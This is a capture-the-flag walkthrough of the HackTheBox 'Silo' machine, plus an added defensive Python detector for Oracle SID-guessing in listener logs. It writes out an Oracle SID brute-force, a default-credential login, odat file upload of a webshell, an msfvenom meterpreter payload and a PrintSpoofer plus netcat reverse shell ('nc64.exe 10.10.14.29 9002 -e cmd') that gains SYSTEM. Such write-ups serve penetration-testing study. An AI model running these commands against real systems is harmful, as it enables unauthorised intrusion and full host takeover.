Silo is a Windows machine on HackTheBox rated Medium; it is a lab for practising Oracle database attacks and Windows privilege escalation.

Machine Information

Techniques the machine involves:

  • Windows enumeration
  • Oracle database risk discovery and exploitation
  • Windows privilege escalation

Information Gathering

For information gathering against a Windows target, as I currently understand it, the main sources are port scanning, enum4linux and SMB file shares.

Port Scan

uzi@kali ~/D/06_Wordlists> nmap -n --min-rate 2000 -T4 -p- --max-retries 10 -Pn -sC -sV 10.129.196.225
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 23:30 CST
Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.33% done; ETC: 23:33 (0:00:08 remaining)
Nmap scan report for 10.129.196.225
Host is up (0.23s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
|_clock-skew: mean: -3s, deviation: 0s, median: -4s
| smb2-time:
| date: 2023-06-02T15:33:11
|_ start_date: 2023-06-02T15:27:59
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.69 seconds

The port scan shows that the target has port 80, port 1521 and a number of other ports open, corresponding to the web service and the Oracle database respectively.
PS: judging by its description, port 49159 also belongs to the Oracle database, but I got nothing useful out of it.

Web Path Scan

The web path scan turned up nothing useful.

[####################] - 6m    270027/270027  0s      found:46      errors:0
[####################] - 3m 30000/30000 192/s http://10.129.95.188/
[####################] - 3m 30000/30000 193/s http://10.129.95.188/aspnet_client/
[####################] - 3m 30000/30000 191/s http://10.129.95.188/Aspnet_client/
[####################] - 3m 30000/30000 187/s http://10.129.95.188/aspnet_Client/
[####################] - 3m 30000/30000 178/s http://10.129.95.188/aspnet_client/system_web/
[####################] - 3m 30000/30000 176/s http://10.129.95.188/ASPNET_CLIENT/
[####################] - 3m 30000/30000 177/s http://10.129.95.188/Aspnet_client/system_web/
[####################] - 3m 30000/30000 176/s http://10.129.95.188/aspnet_Client/system_web/
[####################] - 3m 30000/30000 181/s http://10.129.95.188/ASPNET_CLIENT/system_web/

enum4linux

enum4linux gave no useful information.

uzi@kali ~/D/0/feroxbuster> enum4linux 10.129.196.225
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun 2 23:30:50 2023

=========================================( Target Information )=========================================

Target ........... 10.129.196.225
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


===========================( Enumerating Workgroup/Domain on 10.129.196.225 )===========================


[E] Can't find workgroup/domain



===============================( Nbtstat Information for 10.129.196.225 )===============================

Looking up status of 10.129.196.225
No reply from 10.129.196.225

==================================( Session Check on 10.129.196.225 )==================================


[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

SMB

SMB also exposes no shares that can be accessed without logging in.

uzi@kali ~/D/0/feroxbuster [1]> smbclient -L //10.129.196.225 -N
session setup failed: NT_STATUS_ACCESS_DENIED

Oracle Database Enumeration

The Oracle database enumeration and attack follow the HackTricks tutorial; the general approach is:

  1. Guess the SID
  2. Guess usernames and passwords

Guessing the SID

Probing with auxiliary/scanner/oracle/sid_enum returned no results:

msf6 > use auxiliary/scanner/oracle/sid_enum
msf6 auxiliary(scanner/oracle/sid_enum) > show options

Module options (auxiliary/scanner/oracle/sid_enum):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT    1521             yes       The target port (TCP)
THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/oracle/sid_enum) > set rhosts 10.129.95.188
rhosts => 10.129.95.188
msf6 auxiliary(scanner/oracle/sid_enum) > run

[-] 10.129.95.188:1521 - TNS listener protected for 10.129.95.188...
[*] 10.129.95.188:1521 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Brute-forcing the SID found the following valid SIDs:

msf6 auxiliary(scanner/oracle/sid_enum) > use auxiliary/scanner/oracle/sid_brute
msf6 auxiliary(scanner/oracle/sid_brute) > show options

Module options (auxiliary/scanner/oracle/sid_brute):

Name              Current Setting                                         Required  Description
----              ---------------                                         --------  -----------
BRUTEFORCE_SPEED  5                                                       yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS      false                                                   no        Try each user/password couple stored in the current database
DB_ALL_PASS       false                                                   no        Add all passwords in the current database to the list
DB_ALL_USERS      false                                                   no        Add all users in the current database to the list
DB_SKIP_EXISTING  none                                                    no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
RHOSTS                                                                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT             1521                                                    yes       The target port (TCP)
SID                                                                       no        A specific SID to attempt.
SID_FILE          /usr/share/metasploit-framework/data/wordlists/sid.txt  no        File containing instance names, one per line
STOP_ON_SUCCESS   false                                                   yes       Stop guessing when a credential works for a host
THREADS           1                                                       yes       The number of concurrent threads (max one per host)
VERBOSE           true                                                    yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/oracle/sid_brute) > set rhosts 10.129.95.188
rhosts => 10.129.95.188
msf6 auxiliary(scanner/oracle/sid_brute) > run
...
[+] 10.129.196.225:1521 - 10.129.196.225:1521 Oracle - 'XE' is valid
[+] 10.129.196.225:1521 - 10.129.196.225:1521 Oracle - 'PLSEXTPROC' is valid
[+] 10.129.196.225:1521 - 10.129.196.225:1521 Oracle - 'CLREXTPROC' is valid
[+] 10.129.196.225:1521 - 10.129.196.225:1521 Oracle - '' is valid
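On the database side, an SID wordlist run like the one above leaves a burst of refused connects in the listener log. As an added example that is not part of the original writeup, the following Python detector parses a constructed listener.log excerpt (the log lines, the hosts, including the writeup's attacker address 10.10.14.29 as source, and the threshold are all assumptions) and reports any source host that was refused for several distinct SIDs:

```python
import re
from collections import defaultdict

# Constructed listener.log excerpt (assumption: not from the original post).
# Oracle's listener.log records each connect as
#   timestamp * CONNECT_DATA * ADDRESS * establish * SID * return-code
# where return-code 0 is an accepted connect and 12505 means the listener
# does not know the requested SID, the trace an SID wordlist leaves behind.
SAMPLE_LOG = """\
02-JUN-2023 15:30:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.29)(PORT=50001)) * establish * ORCL * 12505
02-JUN-2023 15:30:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.29)(PORT=50002)) * establish * PROD * 12505
02-JUN-2023 15:30:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.29)(PORT=50003)) * establish * TEST * 12505
02-JUN-2023 15:30:02 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.29)(PORT=50004)) * establish * DEV * 12505
02-JUN-2023 15:30:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.29)(PORT=50005)) * establish * XE * 0
02-JUN-2023 15:31:10 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.20)(PORT=41000)) * establish * XE * 0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \* \(CONNECT_DATA=.*?\) \* "
    r"\(ADDRESS=\(PROTOCOL=tcp\)\(HOST=(?P<src>[^)]+)\)\(PORT=\d+\)\) \* "
    r"establish \* (?P<sid>\S*) \* (?P<rc>\d+)$"
)


def parse_listener_log(text):
    """Return (timestamp, source host, sid, return code) for every connect line."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append((m["ts"], m["src"], m["sid"], int(m["rc"])))
    return records


def find_sid_guessing(text, threshold=3):
    """Map each source host that was refused for at least `threshold` distinct
    SIDs (TNS-12505) to the sorted list of SIDs it tried; a normal client that
    only ever asks for a SID the listener knows is never reported."""
    rejected = defaultdict(set)
    for _ts, src, sid, rc in parse_listener_log(text):
        if rc == 12505:
            rejected[src].add(sid)
    return {src: sorted(sids) for src, sids in rejected.items()
            if len(sids) >= threshold}


if __name__ == "__main__":
    for src, sids in find_sid_guessing(SAMPLE_LOG).items():
        print(f"{src}: refused for {len(sids)} distinct SIDs: {', '.join(sids)}")
```

On a real system the same logic runs over the listener.log under the diagnostic destination, and the threshold and time window should be tuned to how many instances the listener legitimately serves.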

Guessing Usernames and Passwords

When guessing Oracle usernames and passwords, I recommend a wordlist of paired username/password combinations, which reduces the number of requests.
In my own testing, the following methods all performed poorly:

  • msf auxiliary/admin/oracle/oracle_login
  • msf auxiliary/scanner/oracle/oracle_login
  • nmap oracle-brute

Password guessing with odat also took a fair amount of time.

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py passwordguesser -s 10.129.95.188 -p 1521 -d XE

[1] (10.129.95.188:1521): Searching valid accounts on the 10.129.95.188 server, port 1521
The login cis has already been tested at least once. What do you want to do: | ETA: 00:21:01
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:21:39
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:20:50
[!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:19:44
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:16:47
[!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:12:51
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password | ETA: 00:10:03
[!] Notice: 'outln' account is locked, so skipping this username for password | ETA: 00:09:01
[+] Valid credentials found: scott/tiger. Continue... | ETA: 00:04:59
[!] Notice: 'system' account is locked, so skipping this username for password | ETA: 00:03:59
[!] Notice: 'xdb' account is locked, so skipping this username for password######### | ETA: 00:00:59
100% |##################################################################################| Time: 00:24:45
[+] Accounts found on 10.129.95.188:1521/sid:XE:
scott/tiger

Notes on Connecting to the Oracle Database

The HackTricks tutorial covers command execution through the Oracle database, and odat has matching modules.
My own attempts kept failing; only after reading this writeup did I realise that odat accepts a --sysdba flag to connect with SYSDBA privileges.

Connecting as SYSDBA (with --sysdba) allows reading the target's hosts file:

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --getFile "C://windows/system32/drivers/etc" hosts /tmp/hosts1

[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server
[+] Data stored in the hosts file sored in C://windows/system32/drivers/etc (copied in /tmp/hosts1 locally):
b"# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n#\n# This file contains the mappings of IP addresses to host names. Each\n# entry should be kept on an individual line. The IP address should\n# be placed in the first column followed by the corresponding host name.\n# The IP address and the host name should be separated by at least one\n# space.\n#\n# Additionally, comments (such as these) may be inserted on individual\n# lines or following the machine name denoted by a '#' symbol.\n#\n# For example:\n#\n# 102.54.94.97 rhino.acme.com # source server\n# 38.25.63.10 x.acme.com # x client host\n\n# localhost name resolution is handled within DNS itself.\n#\t127.0.0.1 localhost\n#\t::1 localhost\n"

Without --sysdba, reading the target's hosts file fails with insufficient privileges:

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE  --getFile "C://windows/system32/drivers/etc" hosts /tmp/hosts1

[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server
[-] Impossible to read the ['C://windows/system32/drivers/etc', 'hosts', '/tmp/hosts1'] file: `ORA-01031: insufficient privileges`

Initial Foothold

For an initial shell on a Windows server, the way I used to approach labs was to obtain a username and password and then connect with evil-winrm.
On this machine the approach is to upload a webshell to the IIS web directory and work through it; alternatively, a meterpreter or Cobalt Strike payload can be generated, uploaded and executed.

Webshell

Upload the webshell file with odat's file module and use it through the browser.

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --putFile 'C:\Inetpub\wwwroot' a.aspx /usr/share/webshells/aspx/cmdasp.aspx --sysdba

[1] (10.129.95.188:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\Inetpub\wwwroot folder like a.aspx on the 10.129.95.188 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the a.aspx file

meterpreter

Generate the payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows --arch x64 -e x64/xor -i 3  LHOST=10.10.14.29 LPORT=4444 -f exe -o a.exe

Upload the file with odat:

python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' a.exe /home/uzi/Documents/00-Learning/hackthebox/Machines/Silo/a.exe

msf listener:

msf6 auxiliary(admin/oracle/oracle_login) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > run

Execute the file with odat:

python ./odat.py externaltable -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --exec "C:/inetpub/wwwroot" "a.exe"

User Flag

Running dir C:\Users\ from the webshell shows that the user is Phineas, and the user flag can be read directly.

Root Privileges

For Windows privilege escalation, see Abusing Tokens on HackTricks.
Checking the IIS account's privileges earlier showed SeImpersonatePrivilege, which allows direct escalation; see this HackTricks article.

Upload PrintSpoofer and nc

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' PrintSpoofer.exe /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe

[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe local file in the C:\Inetpub\wwwroot folder like PrintSpoofer.exe on the 10.129.95.188 server
[+] The /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the PrintSpoofer.exe file
(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' nc64.exe /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe

[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe local file in the C:\Inetpub\wwwroot folder like nc64.exe on the 10.129.95.188 server
[+] The /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the nc64.exe file

Listen on a local port, then run the escalation command from the webshell:

Webshell:
C:\inetpub\wwwroot\PrintSpoofer.exe -c "C:\inetpub\wwwroot\nc64.exe 10.10.14.29 9002 -e cmd"

Local listener:
uzi@kali ~/D/0/h/M/Silo> nc -lvnp 9002
Listening on 0.0.0.0 9002
Connection received on 10.129.95.188 49166
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

PS: for the local listener I originally wanted to use pwncat-cs, but it threw an error; nc worked without problems.
Also, the privilege escalation part of the machine provides a memory image; the writeups use volatility's lsadump to extract the administrator account's logon password information.
The writeups also note that because the Oracle service runs as SYSTEM, the root flag can be read directly with odat.

Summary

On Silo, during my own attempt I guessed the password but did not connect as SYSDBA.
From this machine I learned about Oracle database exploitation and deepened my understanding of Windows privilege escalation.